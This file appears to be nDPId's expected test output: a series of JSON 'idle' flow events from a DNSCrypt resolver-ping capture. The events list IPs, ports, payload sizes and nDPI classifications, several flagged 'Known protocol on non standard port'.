-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
